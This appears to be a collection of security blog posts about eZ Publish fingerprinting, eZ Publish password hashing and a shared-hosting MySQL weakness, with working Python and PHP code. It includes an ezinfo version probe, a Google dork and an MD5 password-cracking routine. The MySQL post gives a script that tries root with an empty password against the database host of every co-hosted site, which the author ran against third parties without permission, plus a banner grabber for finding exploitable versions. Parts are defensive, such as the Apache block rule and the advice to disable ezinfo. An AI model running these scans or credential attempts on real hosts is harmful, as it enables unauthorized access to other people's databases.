Don’t help the police

One interesting headline in the Norwegian newspapers today is an alleged hacking attempt on a Facebook account. The background story goes something like this:

Norwegian police are handling the abduction of a 16-year-old girl in Oslo. The police think there might be vital information on the victim's Facebook profile, so they requested the login details for her account from Facebook. Facebook allegedly provided the requested information except for her login details. One “hacker” then went rogue and tried to break into her account, playing the Samaritan. Newspaper reports were not conclusive on whether he succeeded.

With this information in mind consider this:

If you have the skills – do not attempt to help the police this way, ever! Remember that the police need access to untampered information with a documented chain of custody. If you break into a service, like Facebook or anything else, and hand them the “evidence”, the investigation team cannot be sure the data is clean: they have no way of telling what was there before you logged in from what was changed by you, or by someone else who got in the same way. Last year we faced exactly the same thing after the massacre on Utøya. Some hackers broke into Breivik's account and the police could not be sure whether the information provided was fake or not. Sure – your intentions might be good. But you might end up causing a major headache for everyone.

So – whether you are a grey hat, a black hat or a skiddie – don’t go down this path. Play fair and point the police in the right direction instead.

eZ Publish – determine version, heartbeat and copyright

eZ Publish ships with a module called “ezinfo” which can be used to get important information about the running system. Among the information we can extract from this module is:

  • eZ Publish version
  • which extensions are installed
  • if the system is able to communicate with the back-end
  • copyright

Note that “ezinfo” does not interface with any engines inside the kernel; it only reports on the installation. A careful site administrator will most often have this module disabled.

How to access

For any eZ Publish based site you can reach this module by appending “/ezinfo/view_name” to the base URL, where view_name is one of the views listed below.

Views

There are currently three views available within ezinfo:

  • about
  • is_alive
  • copyright
about

This is by far the meatiest view, since it displays the version number of eZ Publish and which extensions are in use. A version number is exactly what an attacker needs to look up known vulnerabilities for that release.

is_alive

This view checks the database connection and, if everything is fine, returns the text “eZ Publish is alive!”. It is a free liveness probe: without authenticating, anyone can confirm that both the application and its database back-end are up and reachable.

copyright

By far the least interesting view, since it only displays the copyright information.
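The three views can be checked from a script. The following is an added example and not code from eZ Publish or from the original post. It requests each view under a base URL and reports what was disclosed; the fetcher is injectable so the logic runs offline against constructed responses, and the real fetcher is plain urllib. The only assumption about page content is that the about view prints the version as “eZ Publish <major>.<minor>[.<patch>]”; the “eZ Publish is alive!” marker is the text documented above.

```python
import re
import urllib.request
from typing import Callable, Dict, Optional

ALIVE_MARKER = "eZ Publish is alive!"   # exact text the is_alive view returns
# Assumption: the about view prints the version as "eZ Publish <major>.<minor>[.<patch>]"
VERSION_RE = re.compile(r"eZ Publish\s+(\d+\.\d+(?:\.\d+)?)")
VIEWS = ("about", "is_alive", "copyright")


def http_fetch(url: str, timeout: float = 5.0) -> Optional[str]:
    """Return the response body for url, or None on any HTTP/network error."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.read().decode("utf-8", errors="replace")
    except Exception:
        return None


def probe_ezinfo(base_url: str,
                 fetch: Callable[[str], Optional[str]] = http_fetch) -> Dict[str, object]:
    """Request each ezinfo view under base_url and summarise what it discloses.

    'responded' only means a view answered with a 2xx; the version and the
    alive marker are the reliable signals, since some sites answer every
    path with a 200 error page.
    """
    base = base_url.rstrip("/")
    result: Dict[str, object] = {"responded": False, "alive": False,
                                 "version": None, "views": {}}
    for view in VIEWS:
        body = fetch(f"{base}/ezinfo/{view}")
        result["views"][view] = body is not None
        if body is None:
            continue
        result["responded"] = True
        if view == "is_alive" and ALIVE_MARKER in body:
            result["alive"] = True          # application and database both reachable
        elif view == "about":
            m = VERSION_RE.search(body)
            if m:
                result["version"] = m.group(1)
    return result


# Constructed responses for an offline run; not captured from a real site.
SAMPLE_RESPONSES = {
    "http://example.test/ezinfo/about":
        "<html><body><h1>eZ Publish 4.6.0</h1><p>Extensions: ezwebin, ezjscore</p></body></html>",
    "http://example.test/ezinfo/is_alive": "eZ Publish is alive!",
    "http://example.test/ezinfo/copyright": "Copyright (C) 1999-2012 eZ Systems AS",
}


def sample_fetch(url: str) -> Optional[str]:
    return SAMPLE_RESPONSES.get(url)


if __name__ == "__main__":
    import sys
    # With a URL argument the real fetcher is used; without one, the constructed sample.
    target = sys.argv[1] if len(sys.argv) > 1 else "http://example.test"
    fetch = http_fetch if len(sys.argv) > 1 else sample_fetch
    print(probe_ezinfo(target, fetch=fetch))
```

Run it as `python ezinfo_probe.py http://target/` against a site you are allowed to test; with no argument it runs against the constructed sample and should report version 4.6.0 and alive=True.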

Google Dork

allinurl:/ezinfo/about

Words of advice

If you are running an eZ Publish based site – please consider disabling this “feature”, or at least making sure it is not reachable by anonymous visitors. The about view alone hands an attacker your exact version number.
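If you cannot or would rather not touch the eZ Publish configuration, the module can be blocked in front of the application. The fragment below is an added example, not configuration from the original post or from eZ Systems; it assumes Apache 2.4 syntax and that the ezinfo URLs look like the ones described above, with or without a siteaccess prefix in the path.

```apache
# Added example: refuse every request for the ezinfo module at the web server,
# whether the URL is /ezinfo/about or /<siteaccess>/ezinfo/about.
# Assumes Apache 2.4 (Require); on 2.2 use "Order deny,allow" / "Deny from all".
<LocationMatch "(^|/)ezinfo(/|$)">
    Require all denied
</LocationMatch>
```

After reloading Apache, the probe URLs should return 403 instead of the version page.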

ez Publish password encryption methods

It is always interesting to look at various CMSes and how they implement security. In this post I’ll cover the password hashing methods eZ Publish uses up to (at least) release 4.6 (the code calls them “encryption” methods, but they are one-way hashes). The post is based on the PHP class file kernel\classes\datatypes\ezuser\ezuser.php, where more information can be found.

Various password constants and their use

The basis for this list is the static method below. $type selects which of the constants is used, and $hash, when given, is an existing stored hash; only the crypt type uses it, as the salt:

        static function createHash( $user, $password, $site, $type, $hash = false )
PASSWORD_HASH_MD5_PASSWORD
Unsalted MD5 of the password alone

        $str = md5( $password );
        
PASSWORD_HASH_MD5_USER
MD5 of user and password – which happens to be the default. The username works as a salt-like prefix, so two users with the same password get different hashes, but it is public and the result is still a single fast MD5.

        $str = md5( "$user\n$password" ); // notice the newline character!!!
        
PASSWORD_HASH_MD5_SITE
MD5 of user, password and site, in that order

        $str = md5( "$user\n$password\n$site" ); // again, notice the newline characters!!!
        
PASSWORD_HASH_MYSQL
Legacy support for passwords hashed with MySQL’s own PASSWORD() function. The hash is computed by the database server, not by PHP, so its format depends on the MySQL version.

            $db = eZDB::instance();
            $hash = $db->escapeString( $password ); // pay close attention to any escapes

            $str = $db->arrayQuery( "SELECT PASSWORD( '$hash' )" );
            $hashes = array_values( $str[0] );
            $str = $hashes[0];
        
PASSWORD_HASH_PLAINTEXT
Passwords stored in plaintext; must not be used on real sites

        $str = $password;
        
PASSWORD_HASH_CRYPT
Passwords hashed with PHP’s crypt()

            if ( $hash ) // $hash is an input parameter, false by default. On verification the stored hash is passed in here and crypt() takes its salt (and algorithm) from it.
            {
                $str = crypt( $password, $hash );
            }
            else
            {
                $str = crypt( $password ); // no salt supplied: PHP picks one itself (deprecated since PHP 5.6, a salt is required from PHP 8.0)
            }
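To see what the branches above mean in practice, here is an added example (my own code, not eZ Publish’s) that reproduces the hash formats in Python, verifies a login against a stored value, and shows why the default md5_user type gives an attacker an easy time. The type names are this example’s own; eZ Publish uses integer constants. MySQL’s PASSWORD() is reproduced in its 4.1+ form (“*” followed by SHA1(SHA1(password)) in upper-case hex); the pre-4.1 16-character form and the crypt type, which needs the platform crypt(3), are left out. All credentials below are constructed.

```python
import hashlib
import hmac
from typing import Iterable, Optional


def ez_create_hash(user: str, password: str, site: str, hash_type: str) -> str:
    """Mirror of the createHash() branches, keyed by a type name of this example's own."""
    if hash_type == "md5_password":
        return hashlib.md5(password.encode()).hexdigest()
    if hash_type == "md5_user":                     # eZ Publish default; note the newline
        return hashlib.md5(f"{user}\n{password}".encode()).hexdigest()
    if hash_type == "md5_site":
        return hashlib.md5(f"{user}\n{password}\n{site}".encode()).hexdigest()
    if hash_type == "mysql":
        # MySQL 4.1+ PASSWORD(): "*" + SHA1(SHA1(pw)) as upper-case hex.
        inner = hashlib.sha1(password.encode()).digest()
        return "*" + hashlib.sha1(inner).hexdigest().upper()
    if hash_type == "plaintext":
        return password
    raise ValueError(f"unsupported hash type: {hash_type!r}")


def ez_check_password(stored: str, user: str, password: str, site: str, hash_type: str) -> bool:
    """Verify a login attempt against a stored hash using a constant-time comparison."""
    return hmac.compare_digest(ez_create_hash(user, password, site, hash_type), stored)


def crack_md5_user(stored: str, user: str, wordlist: Iterable[str]) -> Optional[str]:
    """Offline guessing against the default type: the 'salt' is the public
    username, so each candidate costs exactly one MD5 and nothing slows it down."""
    for candidate in wordlist:
        if ez_create_hash(user, candidate, "", "md5_user") == stored:
            return candidate
    return None


if __name__ == "__main__":
    # Constructed credentials, not taken from any real installation.
    user, pw, site = "alice", "s3cret", "example.test"
    for t in ("md5_password", "md5_user", "md5_site", "mysql", "plaintext"):
        print(f"{t:13s} {ez_create_hash(user, pw, site, t)}")
    stored = ez_create_hash(user, pw, site, "md5_user")
    print("cracked:", crack_md5_user(stored, user, ["password", "letmein", "s3cret"]))
```

Note the newline in the md5_user and md5_site inputs: a cracking tool fed plain “userpassword” will never match, which is the quirk the comments in the PHP above point at.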
        

obtaining information about a site

The art of obtaining information has always been an important skill throughout history. As someone once said, “knowledge is power”. The more we know about a thing, the better we are able to master it, or conquer it. The same goes for web sites. The more we know about what others do on their sites, the better a job we can do on our own.

There are many CLI/CMD/GUI tools out there which allow you to get information about a site. That’s completely fine and dandy, but I prefer web based tools. Using web based tools allows me to do quick scans whenever I do not have my laptop available. Sometimes I just pull out information because I am nosy.

Here’s a small list over the tools I frequently use:

http://builtwith.com/
This tool gives a good overview of:

  • CDN (Content Delivery Network)
  • Web server information
  • JavaScript libraries
  • RSS
  • and more

http://guess.scritch.org/
Reports:

  • Web server
  • PHP information (if available)
  • Framework information

http://whois.domaintools.com/
Looks up the WHOIS information for a domain.

http://news.netcraft.com/
Site report with:

  • IP address
  • Hosting information
  • and more

Cascading MySQL mishap

A couple of days ago I was doing some routine cleanup on a remotely hosted site. I have paid access to this server and was working with the MySQL CLI tool. Both username and password are intricate. Just for the hell of it I tried one silly thing: connecting to the server using stock credentials. Voila – instant access. Was this local to that site or not? Follow me in the quest to find out!

About the hosting company

This hosting company is small and offers its services cheaply, just like anyone else in the same segment. Even though I know exactly which platform they offer, I must put myself in the context of an intruder. The very first thing I did was to visit their support page to find out what I’m dealing with. The support FAQ claims they are running *AMPP, but it does not disclose which version of MySQL or which operating system. The FAQ also mentions that you can reach the phpMyAdmin tool by prefixing “db.” to your domain name. Handy information – and this is the basis for what we are going to do.

Since they are an SMB, they most likely have a very limited pool of IP addresses, so they must be hosting multiple sites on the same address. In theory this is a security risk, since any mistake on the shared platform (here: a MySQL server that is reachable from the internet under every customer's db. hostname, with stock credentials) cascades through the entire set of co-hosted sites. Like in this scenario.

We’re now armed with pretty much what we need, so we just need a small script to do the “heavy” lifting.

Investigation

Obtaining a list of targets

We assume they are hosting multiple sites on the same address, so let’s find out which sites exist. We use the reverse IP lookup offered by “You Get Signal” to obtain such a list.

  1. Visit You Get Signal and open the reverse IP lookup
  2. Enter the remote address
  3. Copy and paste the resulting list into Notepad.exe, Gedit or any text editor of choice
  4. Delete all occurrences of “(linkback)” so that only the hostnames remain, one per line
  5. Save the text to a file, e.g. sites_list.txt

Assess sites

Save the following script as “dbconnect.php” in the same directory as the list of sites:

<?php
/**
 * Read targets: one hostname per line (any whitespace separates entries).
 */
if ( $argc < 2 )
{
    fwrite( STDERR, "usage: php dbconnect.php sites_list.txt\n" );
    exit( 1 );
}
$content = file_get_contents( $argv[1] );
$targets = array_filter( preg_split( '/\s+/', $content ) );

/**
 * MySQL connection: stock credentials (root, empty password).
 */
$username = 'root';
$password = '';

// Report failures through return values only; PHP 8.1+ would otherwise throw.
mysqli_report( MYSQLI_REPORT_OFF );

foreach ( $targets as $server )
{
    $server = 'db.' . trim( $server );

    // Short connect timeout so one unreachable host does not stall the whole run.
    $conn = mysqli_init();
    mysqli_options( $conn, MYSQLI_OPT_CONNECT_TIMEOUT, 5 );
    $ok = @mysqli_real_connect( $conn, $server, $username, $password );

    if ( $ok )
    {
        // The server version is available as soon as the connection is up.
        print "\n{$server} is afflicted ... " . mysqli_get_server_info( $conn ) . "\n";
        mysqli_close( $conn );
    }
    else
    {
        print ".";
    }
}
print "\n";

Run it from the command line with the following command (your setup may vary):
php.exe dbconnect.php sites_list.txt

What happens here?

The script reads the entire input list of sites and walks through it. For each hostname it prepends “db.” and tries to connect with common credentials (username root, empty password). On success it prints the hostname and the server version it was given; otherwise it prints a dot and continues until the list is exhausted.

Obtaining MySQL version and name of the operating system

If any of the hosts is vulnerable, you can connect to it from the CLI with the following command, or similar (just press Enter at the password prompt, since the password is empty):
mysql -uroot -p -h prefixedurl

Most likely you will not be able to perform many actions here – but look at the banner. The “Server version” line reveals the MySQL version, and on packaged builds the version suffix usually names the distribution it was built for, which gives away the operating system. Mission done. Armed with this information you might be able to find an exploit or two.
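Note that you do not even need the stock credentials to get the version: the MySQL server sends its version string in the initial handshake packet before the client has authenticated, so a plain TCP connection to port 3306 is enough. The following is an added example (my own code, not from the original post) that reads only that greeting, parses the protocol-v10 handshake fields, and hangs up without sending a login. The sample packet is constructed in the layout a MySQL 5.5+ server uses, including a distribution-style version suffix; it is not a capture from the hosting company. Where the server refuses the client host it sends an ERR packet instead, and that case is handled too.

```python
import socket
import struct
from typing import Any, Dict

CLIENT_SSL = 0x00000800
CLIENT_SECURE_CONNECTION = 0x00008000
CLIENT_PLUGIN_AUTH = 0x00080000


def parse_handshake(packet: bytes) -> Dict[str, Any]:
    """Decode a MySQL protocol-v10 initial handshake, or the ERR packet a
    server sends instead when the client host is refused (e.g. error 1130)."""
    if len(packet) < 4:
        raise ValueError("truncated packet header")
    length = int.from_bytes(packet[0:3], "little")     # 3-byte payload length
    payload = packet[4:4 + length]
    if len(payload) != length:
        raise ValueError("truncated payload")
    if payload[0] == 0xFF:                              # ERR packet
        code = int.from_bytes(payload[1:3], "little")
        return {"error": code, "message": payload[3:].decode(errors="replace")}
    if payload[0] != 10:
        raise ValueError(f"unsupported protocol version {payload[0]}")
    end = payload.index(b"\x00", 1)
    version = payload[1:end].decode("ascii", errors="replace")  # sent before any auth
    pos = end + 1
    conn_id = struct.unpack_from("<I", payload, pos)[0]
    pos += 4
    salt = payload[pos:pos + 8]                          # auth-plugin-data part 1
    pos += 8 + 1                                         # ... plus one filler byte
    caps = struct.unpack_from("<H", payload, pos)[0]     # lower capability flags
    pos += 2
    charset = status = plugin = None
    if len(payload) > pos:                               # MySQL 4.1+ extension
        charset = payload[pos]
        status = struct.unpack_from("<H", payload, pos + 1)[0]
        caps |= struct.unpack_from("<H", payload, pos + 3)[0] << 16
        auth_len = payload[pos + 5]
        pos += 6 + 10                                    # fields above + 10 reserved bytes
        if caps & CLIENT_SECURE_CONNECTION:
            part2 = max(13, auth_len - 8)
            salt += payload[pos:pos + part2].rstrip(b"\x00")
            pos += part2
        if caps & CLIENT_PLUGIN_AUTH:
            plugin = payload[pos:payload.index(b"\x00", pos)].decode("ascii", errors="replace")
    return {"server_version": version, "connection_id": conn_id, "capabilities": caps,
            "ssl": bool(caps & CLIENT_SSL), "charset": charset, "status": status,
            "auth_plugin": plugin, "salt_len": len(salt)}


def _recv_exact(sock: socket.socket, n: int) -> bytes:
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("connection closed before the full packet arrived")
        buf += chunk
    return buf


def grab_banner(host: str, port: int = 3306, timeout: float = 5.0) -> Dict[str, Any]:
    """Read only the server greeting and disconnect; no credentials are sent."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        header = _recv_exact(sock, 4)
        body = _recv_exact(sock, int.from_bytes(header[0:3], "little"))
    return parse_handshake(header + body)


def build_sample_greeting(version: str = "5.5.62-0ubuntu0.14.04.1") -> bytes:
    """Constructed greeting in the layout a MySQL 5.5+ server sends; not a capture."""
    caps = CLIENT_SSL | CLIENT_SECURE_CONNECTION | CLIENT_PLUGIN_AUTH
    payload = (bytes([10]) + version.encode() + b"\x00"
               + struct.pack("<I", 42)                  # connection id
               + b"\x01" * 8 + b"\x00"                  # auth data part 1 + filler
               + struct.pack("<H", caps & 0xFFFF)
               + bytes([33])                            # utf8_general_ci
               + struct.pack("<H", 0x0002)              # SERVER_STATUS_AUTOCOMMIT
               + struct.pack("<H", caps >> 16)
               + bytes([21])                            # total auth-plugin-data length
               + b"\x00" * 10                           # reserved
               + b"\x02" * 12 + b"\x00"                 # auth data part 2 (13 bytes)
               + b"mysql_native_password\x00")
    return len(payload).to_bytes(3, "little") + b"\x00" + payload


if __name__ == "__main__":
    import sys
    # With a hostname argument the real server is queried; without one, the sample packet.
    info = grab_banner(sys.argv[1]) if len(sys.argv) > 1 else parse_handshake(build_sample_greeting())
    print(info)
```

The version string is the interesting field: a suffix such as “-0ubuntu0.14.04.1” in the constructed sample is how distribution packages tag their builds, which is what lets the banner alone point at the operating system. The exact OS name can only be read after login, from the version_compile_os variable.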

Aftermath

I did not find a vast number of vulnerable sites – only a few. But nevertheless – they were vulnerable alright. So what, you might ask? If we know which operating system they run and which version, plus which version of the database server, we can go hunting for exploits. The hosting company could be running a really outdated version of any of the aforementioned tools and would most likely be an easy target.

The web hosting company was notified two days ago, but they have yet to respond.

Update August 11th:
Support has not replied to this notification. I have sent another support request on this issue. If they don’t respond within two days I’ll disclose the name of this hosting service.